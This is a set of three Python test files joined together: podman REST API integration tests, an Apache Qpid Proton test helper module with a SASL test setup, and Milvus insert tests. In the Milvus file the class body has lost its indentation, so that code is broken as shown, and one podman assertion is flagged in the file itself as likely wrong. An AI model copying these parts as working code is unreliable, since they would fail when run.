    response (if any) is logged to stderr and the exception re-raised.
    """
    # Initialize r so the handler can tell "request never completed" from
    # "request returned a bad body". Previously, if requests.get itself
    # raised, `r` was unbound and `if r is not None` crashed with
    # UnboundLocalError, masking the real error.
    r = None
    try:
        r = requests.get(_url("/containers/json?all=true"))
        ctnrs = json.loads(r.text)
    except Exception as e:
        msg = f"Bad container response: {e}"
        if r is not None:
            msg = msg + " " + r.text
        sys.stderr.write(msg + "\n")
        raise
    return path.format(ctnrs[0]["Id"])
def validateObjectFields(buffer):
    """Parse a JSON payload and verify every object exposes an "Id" field.

    Accepts either a single JSON object or a list of objects; raises
    KeyError when any object lacks "Id". Returns the parsed payload.
    """
    objs = json.loads(buffer)
    if isinstance(objs, dict):
        _ = objs["Id"]
    else:
        for o in objs:
            _ = o["Id"]
    return objs
class TestApi(unittest.TestCase):
    """Integration tests driving the podman libpod v2.0.0 REST API.

    setUpClass spawns `podman system service` on tcp:localhost:8080 and
    pulls the alpine image; setUp creates one short-lived container so the
    per-test `{}`-substitution in ctnr() has something to find.
    """

    podman = None  # initialized podman configuration for tests
    service = None  # podman service instance

    def setUp(self):
        super().setUp()
        # Create a fresh container so every test has at least one to query.
        try:
            TestApi.podman.run("run", "alpine", "/bin/ls", check=True)
        except subprocess.CalledProcessError as e:
            if e.stdout:
                sys.stdout.write("\nRun Stdout:\n" + e.stdout.decode("utf-8"))
            if e.stderr:
                sys.stderr.write("\nRun Stderr:\n" + e.stderr.decode("utf-8"))
            raise

    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        TestApi.podman = Podman()
        TestApi.service = TestApi.podman.open(
            "system", "service", "tcp:localhost:8080", "--time=0"
        )
        # give the service some time to be ready...
        time.sleep(2)

        # A non-None poll() means the service already exited: fail fast.
        returncode = TestApi.service.poll()
        if returncode is not None:
            raise subprocess.CalledProcessError(returncode, "podman system service")

        r = requests.post(_url("/images/pull?reference=docker.io%2Falpine%3Alatest"))
        if r.status_code != 200:
            raise subprocess.CalledProcessError(
                r.status_code, f"podman images pull docker.io/alpine:latest {r.text}"
            )

    @classmethod
    def tearDownClass(cls):
        # Stop the service and surface anything it printed while running.
        TestApi.service.terminate()
        stdout, stderr = TestApi.service.communicate(timeout=0.5)
        if stdout:
            sys.stdout.write("\nService Stdout:\n" + stdout.decode("utf-8"))
        if stderr:
            sys.stderr.write("\nService Stderr:\n" + stderr.decode("utf-8"))
        return super().tearDownClass()

    def test_info(self):
        r = requests.get(_url("/info"))
        self.assertEqual(r.status_code, 200)
        self.assertIsNotNone(r.content)
        _ = json.loads(r.text)

    def test_events(self):
        # Events arrive as one JSON object per line.
        r = requests.get(_url("/events?stream=false"))
        self.assertEqual(r.status_code, 200, r.text)
        self.assertIsNotNone(r.content)
        for line in r.text.splitlines():
            obj = json.loads(line)
            # Actor.ID is uppercase for compatibility
            _ = obj["Actor"]["ID"]

    def test_containers(self):
        # Without all=true only running containers are listed.
        r = requests.get(_url("/containers/json"), timeout=5)
        self.assertEqual(r.status_code, 200, r.text)
        obj = json.loads(r.text)
        self.assertEqual(len(obj), 0)

    def test_containers_all(self):
        r = requests.get(_url("/containers/json?all=true"))
        self.assertEqual(r.status_code, 200, r.text)
        validateObjectFields(r.text)

    def test_inspect_container(self):
        r = requests.get(_url(ctnr("/containers/{}/json")))
        self.assertEqual(r.status_code, 200, r.text)
        obj = validateObjectFields(r.content)
        # "Created" must parse as a date.
        _ = parse(obj["Created"])

    def test_stats(self):
        # 409 is tolerated — stats may be unsupported in some
        # configurations (TODO confirm which ones the service reports).
        r = requests.get(_url(ctnr("/containers/{}/stats?stream=false")))
        self.assertIn(r.status_code, (200, 409), r.text)
        if r.status_code == 200:
            validateObjectFields(r.text)

    def test_delete_containers(self):
        r = requests.delete(_url(ctnr("/containers/{}")))
        self.assertEqual(r.status_code, 204, r.text)

    def test_stop_containers(self):
        # Start first so stopping has an effect; 304 means "already there".
        r = requests.post(_url(ctnr("/containers/{}/start")))
        self.assertIn(r.status_code, (204, 304), r.text)

        r = requests.post(_url(ctnr("/containers/{}/stop")))
        self.assertIn(r.status_code, (204, 304), r.text)

    def test_start_containers(self):
        r = requests.post(_url(ctnr("/containers/{}/stop")))
        self.assertIn(r.status_code, (204, 304), r.text)

        r = requests.post(_url(ctnr("/containers/{}/start")))
        self.assertIn(r.status_code, (204, 304), r.text)

    def test_restart_containers(self):
        r = requests.post(_url(ctnr("/containers/{}/start")))
        self.assertIn(r.status_code, (204, 304), r.text)

        r = requests.post(_url(ctnr("/containers/{}/restart")), timeout=5)
        self.assertEqual(r.status_code, 204, r.text)

    def test_resize(self):
        r = requests.post(_url(ctnr("/containers/{}/resize?h=43&w=80")))
        self.assertIn(r.status_code, (200, 409), r.text)
        if r.status_code == 200:
            # NOTE(review): requests' Response.text is always a str (possibly
            # empty), never None, so this assertion looks like it would fail
            # on any 200 response — confirm whether it should be
            # assertEqual(r.text, "") instead.
            self.assertIsNone(r.text)

    def test_attach_containers(self):
        self.skipTest("FIXME: Test timeouts")
        r = requests.post(_url(ctnr("/containers/{}/attach")), timeout=5)
        self.assertIn(r.status_code, (101, 500), r.text)

    def test_logs_containers(self):
        r = requests.get(_url(ctnr("/containers/{}/logs?stdout=true")))
        self.assertEqual(r.status_code, 200, r.text)

    def test_post_create(self):
        self.skipTest("TODO: create request body")
        r = requests.post(_url("/containers/create?args=True"))
        self.assertEqual(r.status_code, 200, r.text)
        json.loads(r.text)

    def test_commit(self):
        r = requests.post(_url(ctnr("/commit?container={}")))
        self.assertEqual(r.status_code, 200, r.text)
        validateObjectFields(r.text)

    def test_images(self):
        r = requests.get(_url("/images/json"))
        self.assertEqual(r.status_code, 200, r.text)
        validateObjectFields(r.content)

    def test_inspect_image(self):
        r = requests.get(_url("/images/alpine/json"))
        self.assertEqual(r.status_code, 200, r.text)
        obj = validateObjectFields(r.content)
        _ = parse(obj["Created"])

    def test_delete_image(self):
        r = requests.delete(_url("/images/alpine?force=true"))
        self.assertEqual(r.status_code, 200, r.text)
        json.loads(r.text)

    def test_pull(self):
        r = requests.post(_url("/images/pull?reference=alpine"), timeout=15)
        self.assertEqual(r.status_code, 200, r.status_code)

        text = r.text
        # Track which stanza kinds appeared in the streamed pull output.
        keys = {
            "error": False,
            "id": False,
            "images": False,
            "stream": False,
        }
        # Read and record stanza's from pull
        for line in str.splitlines(text):
            obj = json.loads(line)
            key_list = list(obj.keys())
            for k in key_list:
                keys[k] = True

        self.assertFalse(keys["error"], "Expected no errors")
        self.assertTrue(keys["id"], "Expected to find id stanza")
        self.assertTrue(keys["images"], "Expected to find images stanza")
        self.assertTrue(keys["stream"], "Expected to find stream progress stanza's")

    def test_search(self):
        # Had issues with this test hanging when repositories not happy
        def do_search():
            r = requests.get(_url("/images/search?term=alpine"), timeout=5)
            self.assertEqual(r.status_code, 200, r.text)
            json.loads(r.text)

        # Run in a separate process so a hung registry can't hang the suite.
        search = Process(target=do_search)
        search.start()
        search.join(timeout=10)
        self.assertFalse(search.is_alive(), "/images/search took too long")

    def test_ping(self):
        # _ping must answer at both the compat root and the libpod prefix,
        # for both GET and HEAD.
        r = requests.get(PODMAN_URL + "/_ping")
        self.assertEqual(r.status_code, 200, r.text)

        r = requests.head(PODMAN_URL + "/_ping")
        self.assertEqual(r.status_code, 200, r.text)

        r = requests.get(_url("/_ping"))
        self.assertEqual(r.status_code, 200, r.text)

        r = requests.get(_url("/_ping"))
        self.assertEqual(r.status_code, 200, r.text)
# Allow running this module directly: executes the whole TestApi suite.
if __name__ == "__main__":
    unittest.main()
|
common.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from unittest import TestCase
# Prefer the stdlib SkipTest; fall back to unittest2, then to a local stub.
# Catch ImportError specifically — the original bare `except:` would also
# swallow KeyboardInterrupt/SystemExit and hide real import failures.
try:
    from unittest import SkipTest
except ImportError:
    try:
        from unittest2 import SkipTest
    except ImportError:
        class SkipTest(Exception):
            """Raised to mark a test as skipped when no runner support exists."""
            pass
from random import randint
from threading import Thread
from socket import socket, AF_INET, SOCK_STREAM
from subprocess import Popen,PIPE,STDOUT
import sys, os, string, subprocess
from proton import Connection, Transport, SASL, Endpoint, Delivery, SSL
from proton.reactor import Container
from proton.handlers import CHandshaker, CFlowController
from string import Template
# Compatibility shim: provide a next() builtin on Python < 2.6 (old Jython).
# On any modern interpreter this entire block is skipped.
if sys.version_info[0] == 2 and sys.version_info[1] < 6:
    # this is for compatibility, apparently the version of jython we
    # use doesn't have the next() builtin.
    # we should remove this when we upgrade to a python 2.6+ compatible version
    # of jython
    #_DEF = object() This causes the test loader to fail (why?)
    class _dummy(): pass
    _DEF = _dummy

    def next(iter, default=_DEF):
        try:
            return iter.next()
        except StopIteration:
            # _DEF is a sentinel meaning "no default supplied": re-raise.
            if default is _DEF:
                raise
            else:
                return default
    # I may goto hell for this:
    import __builtin__
    __builtin__.__dict__['next'] = next
def free_tcp_ports(count=1):
    """Return a list of `count` TCP ports that are free to use (ie. unbound).

    Each candidate port is probed by binding a throwaway socket; all probe
    sockets stay open until the full list is gathered (so the same port is
    not handed out twice) and are closed before returning. Note a returned
    port is only *likely* still free when the caller binds it.
    """
    retry = 0
    ports = []
    sockets = []
    while len(ports) != count:
        port = randint(49152, 65535)
        sockets.append(socket(AF_INET, SOCK_STREAM))
        try:
            sockets[-1].bind(("0.0.0.0", port))
            ports.append(port)
            retry = 0
        except (OSError, IOError):
            # Port in use (or otherwise unbindable): pick another, giving up
            # after 100 consecutive failures. Catching OSError/IOError
            # (socket.error) instead of the original bare `except:` lets
            # KeyboardInterrupt and real errors propagate.
            retry += 1
            assert retry != 100, "No free sockets available for test!"
    for s in sockets:
        s.close()
    return ports
def free_tcp_port():
    """Return a single TCP port number that was free when probed."""
    (port,) = free_tcp_ports(1)
    return port
def pump_uni(src, dst, buffer_size=1024):
    """Move up to buffer_size pending bytes from src to dst (one direction).

    Negative pending()/capacity() values mean the respective end is closed;
    closure is propagated (close_head/close_tail) accordingly.

    Returns True when any progress was made (bytes moved or a closure
    propagated), False when there is nothing to do.
    """
    pending = src.pending()
    capacity = dst.capacity()
    if capacity < 0:
        # dst can take no more input; mirror the closure back to src unless
        # src is already closed too.
        if pending < 0:
            return False
        src.close_head()
        return True
    if pending < 0:
        dst.close_tail()
        return True
    if pending == 0 or capacity == 0:
        return False
    chunk = src.peek(min(capacity, buffer_size))
    dst.push(chunk)
    src.pop(len(chunk))
    return True
def pump(transport1, transport2, buffer_size=1024):
    """Transfer all pending bytes between two Proton engines.

    Repeatedly pumps each direction until neither side makes progress,
    i.e. both transports have drained (or closed).
    """
    progressed = True
    while progressed:
        progressed = (pump_uni(transport1, transport2, buffer_size) or
                      pump_uni(transport2, transport1, buffer_size))
def findfileinpath(filename, searchpath):
    """Find *filename* in the os.pathsep-separated *searchpath*.

    Returns the absolute path of the first match, or None when the file
    is not present in any of the directories.
    """
    for directory in searchpath.split(os.pathsep):
        candidate = os.path.join(directory, filename)
        if os.path.exists(candidate):
            return os.path.abspath(candidate)
    return None
def isSSLPresent():
    """Return SSL.present(): whether proton's SSL support is available."""
    return SSL.present()
# Set to True once _cyrusSetup has successfully written a SASL database.
createdSASLDb = False

def _cyrusSetup(conf_dir):
    """Write out a simple Cyrus SASL config and sasldb under *conf_dir*.

    Locates saslpasswd2 (via $SASLPASSWD or $PATH); when found, recreates
    *conf_dir*, writes a proton-server.conf pointing at a fresh sasldb,
    seeds a "user@proton" entry, and exports PN_SASL_CONFIG_PATH. Does
    nothing when the tool is unavailable.
    """
    saslpasswd = ""
    if 'SASLPASSWD' in os.environ:
        saslpasswd = os.environ['SASLPASSWD']
    else:
        saslpasswd = findfileinpath('saslpasswd2', os.getenv('PATH')) or ""
    if os.path.exists(saslpasswd):
        t = Template("""sasldb_path: ${db}
mech_list: EXTERNAL DIGEST-MD5 SCRAM-SHA-1 CRAM-MD5 PLAIN ANONYMOUS
""")
        abs_conf_dir = os.path.abspath(conf_dir)
        # Start from a clean directory each run.
        subprocess.call(args=['rm', '-rf', abs_conf_dir])
        os.mkdir(abs_conf_dir)
        db = os.path.join(abs_conf_dir, 'proton.sasldb')
        conf = os.path.join(abs_conf_dir, 'proton-server.conf')
        # Use a context manager so the config file is closed even on error
        # (the original open/write/close leaked the handle on failure).
        with open(conf, 'w') as f:
            f.write(t.substitute(db=db))
        cmd_template = Template("echo password | ${saslpasswd} -c -p -f ${db} -u proton user")
        cmd = cmd_template.substitute(db=db, saslpasswd=saslpasswd)
        # NOTE(review): shell=True with an interpolated executable path; the
        # path comes from the local environment, so this test-only helper
        # must never see untrusted input.
        subprocess.call(args=cmd, shell=True)
        os.environ['PN_SASL_CONFIG_PATH'] = abs_conf_dir
        global createdSASLDb
        createdSASLDb = True
# Globally initialize Cyrus SASL configuration
# Import-time side effect: every test in this process sees the
# PN_SASL_CONFIG_PATH environment variable set by _cyrusSetup.
if SASL.extended():
    _cyrusSetup('sasl_conf')
class DefaultConfig:
    """Fallback configuration used when no explicit config is installed."""
    # Shared dict of -D style defines consulted by Test.default().
    defines = {}
class Test(TestCase):
    """Base test case whose tunables come from a configuration of defines."""

    config = DefaultConfig()

    def __init__(self, name):
        super(Test, self).__init__(name)
        self.name = name

    def configure(self, config):
        """Install the configuration object consulted by default()."""
        self.config = config

    def default(self, name, value, **profiles):
        """Resolve *name* from the config defines.

        Precedence: an explicit define for *name*, then the value bound to
        the active "profile" define in *profiles*, then *value* itself.
        """
        profile = self.config.defines.get("profile")
        fallback = profiles.get(profile, value) if profile else value
        return self.config.defines.get(name, fallback)

    @property
    def delay(self):
        """Base delay in seconds (0.1 under the "fast" profile)."""
        return float(self.default("delay", "1", fast="0.1"))

    @property
    def timeout(self):
        """Operation timeout in seconds (10 under the "fast" profile)."""
        return float(self.default("timeout", "60", fast="10"))

    @property
    def verbose(self):
        """Verbosity level as an int (0 = quiet)."""
        return int(self.default("verbose", 0))
class Skipped(SkipTest):
    # Legacy marker attribute recognized by older in-tree test runners.
    skipped = True
class TestServer(object):
    """ Base class for creating test-specific message servers.
    """

    def __init__(self, **kwargs):
        self.args = kwargs
        self.reactor = Container(self)
        self.host = "127.0.0.1"
        self.port = 0
        if "host" in kwargs:
            self.host = kwargs["host"]
        if "port" in kwargs:
            self.port = kwargs["port"]
        # Prime flow-control credit and drive the protocol handshake
        # automatically for every connection.
        self.handlers = [CFlowController(10), CHandshaker()]
        self.thread = Thread(name="server-thread", target=self.run)
        self.thread.daemon = True
        self.running = True
        # Connection close conditions recorded by on_connection_local_close.
        self.conditions = []

    def start(self):
        # Start the reactor, bind an acceptor (retrying random ephemeral
        # ports on collision), then launch the server thread.
        # NOTE(review): when a fixed port is supplied in kwargs, retry stays
        # 0, the while loop is skipped, no acceptor is created and the
        # assert below fires — confirm whether that path is ever exercised.
        # NOTE(review): the port is stored as a str here but may be an int
        # from __init__ — confirm callers treat both consistently.
        self.reactor.start()
        retry = 0
        if self.port == 0:
            self.port = str(randint(49152, 65535))
            retry = 10
        while retry > 0:
            try:
                self.acceptor = self.reactor.acceptor(self.host, self.port)
                break
            except IOError:
                self.port = str(randint(49152, 65535))
                retry -= 1
        assert retry > 0, "No free port for server to listen on!"
        self.thread.start()

    def stop(self):
        # Flip the flag, then wake the reactor so run() notices and exits.
        self.running = False
        self.reactor.wakeup()
        self.thread.join()

    # Note: all following methods all run under the thread:

    def run(self):
        # Periodic timeout so a stop() request is noticed promptly.
        self.reactor.timeout = 3.14159265359
        while self.reactor.process():
            if not self.running:
                self.acceptor.close()
                self.reactor.stop()
                break

    def on_connection_bound(self, event):
        if "idle_timeout" in self.args:
            event.transport.idle_timeout = self.args["idle_timeout"]

    def on_connection_local_close(self, event):
        self.conditions.append(event.connection.condition)

    def on_delivery(self, event):
        event.delivery.settle()
|
test_insert.py | import pytest
from pymilvus import DataType, ParamError, BaseException
from utils.utils import *
from common.constants import *
from common.common_type import CaseLabel
# Per-test timeout (seconds) applied to insert-related cases.
ADD_TIMEOUT = 60
# Prefix used for generated collection names.
uid = "test_insert"
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
# Canonical single-vector top-10 L2 search request reused by the tests below.
default_single_query = {
    "bool": {
        "must": [
            {"vector": {field_name: {"topk": 10, "query": gen_vectors(1, default_dim), "metric_type": "L2",
                                     "params": {"nprobe": 10}}}}
        ]
    }
}
class TestInsertBase:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
    scope="function",
    params=gen_simple_index()
)
def get_simple_index(self, request, connect):
    """Yield each simple index config, skipping types the CPU build rejects."""
    if request.param["index_type"] in index_cpu_not_support():
        pytest.skip("CPU not support index_type: ivf_sq8h")
    logging.getLogger().info(request.param)
    return request.param
@pytest.fixture(
    scope="function",
    params=gen_single_filter_fields()
)
def get_filter_field(self, request):
    # Yields each scalar (filter) field schema variant in turn.
    yield request.param
@pytest.fixture(
    scope="function",
    params=gen_single_vector_fields()
)
def get_vector_field(self, request):
    # Yields each vector field schema variant in turn.
    yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_empty_entity(self, connect, collection):
    """Inserting an empty entity list must raise a ParamError."""
    empty_entities = []
    with pytest.raises(ParamError):
        connect.insert(collection, empty_entities)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_None(self, connect, collection):
    """Passing None as the entities argument must raise."""
    with pytest.raises(Exception):
        connect.insert(collection, None)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_collection_not_existed(self, connect):
    """Inserting into a random, non-existent collection must raise."""
    missing_name = gen_unique_str(uid)
    with pytest.raises(BaseException):
        connect.insert(missing_name, default_entities)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_without_connect(self, dis_connect, collection):
    """Inserting through a disconnected client must raise."""
    with pytest.raises(Exception):
        dis_connect.insert(collection, default_entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_drop_collection(self, connect, collection):
    """A collection can be dropped immediately after an insert."""
    insert_result = connect.insert(collection, default_entity)
    assert len(insert_result.primary_keys) == 1
    connect.drop_collection(collection)
    assert connect.has_collection(collection) == False
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_flush_drop_collection(self, connect, collection):
    """A collection can be flushed and then dropped after an insert."""
    insert_result = connect.insert(collection, default_entity)
    assert len(insert_result.primary_keys) == 1
    connect.flush([collection])
    connect.drop_collection(collection)
    assert connect.has_collection(collection) == False
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_create_index(self, connect, collection, get_simple_index):
    """Building an index after inserting entities leaves the expected index."""
    insert_result = connect.insert(collection, default_entities)
    assert len(insert_result.primary_keys) == default_nb
    connect.flush([collection])
    connect.create_index(collection, field_name, get_simple_index)
    if get_simple_index["index_type"] != "FLAT":
        described = connect.describe_index(collection, "")
        create_target_index(get_simple_index, field_name)
        assert described == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_after_create_index(self, connect, collection, get_simple_index):
    """Inserting after the index is built succeeds and keeps the index."""
    connect.create_index(collection, field_name, get_simple_index)
    insert_result = connect.insert(collection, default_entities)
    assert len(insert_result.primary_keys) == default_nb
    if get_simple_index["index_type"] != "FLAT":
        described = connect.describe_index(collection, "")
        create_target_index(get_simple_index, field_name)
        assert described == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_search(self, connect, collection):
    """Inserted entities are searchable after flush and load."""
    connect.insert(collection, default_entities)
    connect.flush([collection])
    connect.load_collection(collection)
    search_res = connect.search(collection, default_single_query)
    assert len(search_res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_segment_row_count(self, connect, collection):
    """(disabled) Inserting limit+1 rows must split into two segments."""
    nb = default_segment_row_limit + 1
    insert_result = connect.insert(collection, gen_entities(nb))
    connect.flush([collection])
    assert len(insert_result.primary_keys) == nb
    stats = connect.get_collection_stats(collection)
    segments = stats['partitions'][0]['segments']
    assert len(segments) == 2
    for segment in segments:
        assert segment['row_count'] in [default_segment_row_limit, 1]
@pytest.fixture(
    scope="function",
    params=[
        1,
        2000
    ],
)
def insert_count(self, request):
    # Parametrizes insert cases with a minimal (1) and a bulk (2000) row count.
    yield request.param
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids(self, connect, id_collection, insert_count):
    """
    target: test insert entities in collection, use customize ids
    method: create collection and insert entities in it, check the ids returned and the collection length after entities inserted
    expected: the length of ids and the collection row count
    """
    row_num = insert_count
    custom_ids = list(range(row_num))
    data = gen_entities(row_num)
    data[0]["values"] = custom_ids
    insert_res = connect.insert(id_collection, data)
    connect.flush([id_collection])
    assert row_num == len(insert_res.primary_keys)
    assert custom_ids == insert_res.primary_keys
    stats = connect.get_collection_stats(id_collection)
    assert row_num == stats[row_count]
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_the_same_ids(self, connect, id_collection, insert_count):
    """
    target: test insert vectors in collection, use customize the same ids
    method: create collection and insert vectors in it, check the ids returned and the collection length after vectors inserted
    expected: the length of ids and the collection row count
    """
    row_num = insert_count
    # Every row deliberately carries the same id value.
    same_ids = [1] * row_num
    data = gen_entities(row_num)
    data[0]["values"] = same_ids
    insert_res = connect.insert(id_collection, data)
    connect.flush([id_collection])
    assert row_num == len(insert_res.primary_keys)
    assert same_ids == insert_res.primary_keys
    stats = connect.get_collection_stats(id_collection)
    assert row_num == stats[row_count]
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids_fields(self, connect, get_filter_field, get_vector_field):
    """
    target: test create normal collection with different fields, insert entities into id with ids
    method: create collection with diff fields: metric/field_type/..., insert, and count
    expected: row count correct
    """
    row_num = 5
    schema = {
        "fields": [gen_primary_field(), get_filter_field, get_vector_field],
        "auto_id": False
    }
    new_collection = gen_unique_str("test_collection")
    connect.create_collection(new_collection, schema)
    custom_ids = list(range(row_num))
    data = gen_entities_by_fields(schema["fields"], row_num, default_dim, custom_ids)
    logging.getLogger().info(data)
    insert_res = connect.insert(new_collection, data)
    assert insert_res.primary_keys == custom_ids
    connect.flush([new_collection])
    stats = connect.get_collection_stats(new_collection)
    assert stats[row_count] == row_num
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_not_match(self, connect, id_collection, insert_count):
    """
    target: test insert entities in collection without ids
    method: create id_collection and insert entities without
    expected: exception raised
    """
    row_num = insert_count
    with pytest.raises(Exception):
        data = gen_entities(row_num)
        # Strip the explicit-id field; an id_collection must reject such rows.
        del data[0]
        connect.insert(id_collection, data)
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_twice_ids_no_ids(self, connect, id_collection):
    """
    target: check the result of insert, with params ids and no ids
    method: test insert vectors twice, use customize ids first, and then use no ids
    expected: BaseException raised
    """
    custom_ids = list(range(default_nb))
    data = copy.deepcopy(default_entities)
    data[0]["values"] = custom_ids
    connect.insert(id_collection, data)
    # Second insert drops the id field and must be rejected.
    with pytest.raises(Exception):
        del data[0]
        connect.insert(id_collection, data)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_not_ids(self, connect, id_collection):
    """
    target: check the result of insert, with params ids and no ids
    method: test insert vectors twice, use not ids first, and then use customize ids
    expected: error raised
    """
    data = copy.deepcopy(default_entities)
    # id_collection requires explicit ids; removing them must fail.
    del data[0]
    with pytest.raises(Exception):
        connect.insert(id_collection, data)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids_length_not_match_batch(self, connect, id_collection):
    """
    target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
    method: create collection and insert vectors in it
    expected: raise an exception
    """
    # One id short of the batch size.
    short_ids = list(range(1, default_nb))
    logging.getLogger().info(len(short_ids))
    data = copy.deepcopy(default_entities)
    data[0]["values"] = short_ids
    with pytest.raises(Exception):
        connect.insert(id_collection, data)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_length_not_match_single(self, connect, id_collection):
    """
    target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
    method: create collection and insert vectors in it
    expected: raise an exception
    """
    # Many ids against a single-row entity.
    surplus_ids = list(range(1, default_nb))
    logging.getLogger().info(len(surplus_ids))
    single = copy.deepcopy(default_entity)
    single[0]["values"] = surplus_ids
    with pytest.raises(Exception):
        connect.insert(id_collection, single)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_partition(self, connect, collection):
    """
    target: test insert entities in collection created before
    method: create collection and insert entities in it, with the partition_name param
    expected: the collection row count equals to nq
    """
    connect.create_partition(collection, default_tag)
    insert_res = connect.insert(collection, default_entities, partition_name=default_tag)
    assert default_nb == len(insert_res.primary_keys)
    assert connect.has_partition(collection, default_tag)
    connect.flush([collection])
    stats = connect.get_collection_stats(collection)
    assert default_nb == stats[row_count]
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_partition_with_ids(self, connect, id_collection):
    """
    target: test insert entities in collection created before, insert with ids
    method: create collection and insert entities in it, with the partition_name param
    expected: the collection row count equals to nq
    """
    connect.create_partition(id_collection, default_tag)
    custom_ids = list(range(default_nb))
    data = gen_entities(default_nb)
    data[0]["values"] = custom_ids
    insert_res = connect.insert(id_collection, data, partition_name=default_tag)
    assert insert_res.primary_keys == custom_ids
    logging.getLogger().info(connect.describe_collection(id_collection))
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_default_partition(self, connect, collection):
    """
    target: test insert entities into default partition
    method: create partition and insert info collection without tag params
    expected: the collection row count equals to nb
    """
    insert_res = connect.insert(collection, default_entities, partition_name=default_partition_name)
    assert default_nb == len(insert_res.primary_keys)
    connect.flush([collection])
    stats = connect.get_collection_stats(collection)
    assert default_nb == stats[row_count]
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_partition_not_existed(self, connect, collection):
    """
    target: test insert entities in collection created before
    method: create collection and insert entities in it, with the not existed partition_name param
    expected: error raised
    """
    # A freshly generated name is guaranteed not to be a partition yet.
    missing_tag = gen_unique_str()
    with pytest.raises(Exception):
        connect.insert(collection, default_entities, partition_name=missing_tag)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_partition_repeatedly(self, connect, collection):
    """
    target: test insert entities in collection created before
    method: create collection and insert entities in it repeatly, with the partition_name param
    expected: the collection row count equals to nq
    """
    connect.create_partition(collection, default_tag)
    for _ in range(2):
        connect.insert(collection, default_entities, partition_name=default_tag)
    connect.flush([collection])
    stats = connect.get_collection_stats(collection)
    assert 2 * default_nb == stats[row_count]
@pytest.mark.tags(CaseLabel.L0)
def test_insert_dim_not_matched(self, connect, collection):
    """
    target: test insert entities, the vector dimension is not equal to the collection dimension
    method: the entities dimension is half of the collection dimension, check the status
    expected: error raised
    """
    half_dim_vectors = gen_vectors(default_nb, int(default_dim) // 2)
    data = copy.deepcopy(default_entities)
    data[-1]["values"] = half_dim_vectors
    with pytest.raises(Exception):
        connect.insert(collection, data)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_name_not_match(self, connect, collection, get_field_name):
    """
    target: test insert entities, with the entity field name updated
    method: update entity field name
    expected: error raised
    """
    bad_entity = update_field_name(copy.deepcopy(default_entity), "int64", "int64new")
    with pytest.raises(Exception):
        connect.insert(collection, bad_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_type_not_match(self, connect, collection, get_field_type):
    """
    target: test insert entities, with the entity field type updated
    method: update entity field type
    expected: error raised
    """
    bad_entity = update_field_type(copy.deepcopy(default_entity), "int64", DataType.FLOAT)
    with pytest.raises(Exception):
        connect.insert(collection, bad_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_value_not_match(self, connect, collection, get_field_int_value):
    """
    target: test insert entities, with the entity field value updated
    method: update entity field value
    expected: error raised
    """
    bad_entity = update_field_value(copy.deepcopy(default_entity), DataType.FLOAT, 's')
    with pytest.raises(Exception):
        connect.insert(collection, bad_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_more(self, connect, collection):
    """
    target: test insert entities, with more fields than collection schema
    method: add entity field
    expected: error raised
    """
    bad_entity = add_field(copy.deepcopy(default_entity))
    with pytest.raises(Exception):
        connect.insert(collection, bad_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_vector_more(self, connect, collection):
    """
    target: test insert entities, with more fields than collection schema
    method: add entity vector field
    expected: error raised
    """
    bad_entity = add_vector_field(default_nb, default_dim)
    with pytest.raises(Exception):
        connect.insert(collection, bad_entity)
@pytest.mark.tags(CaseLabel.L0)
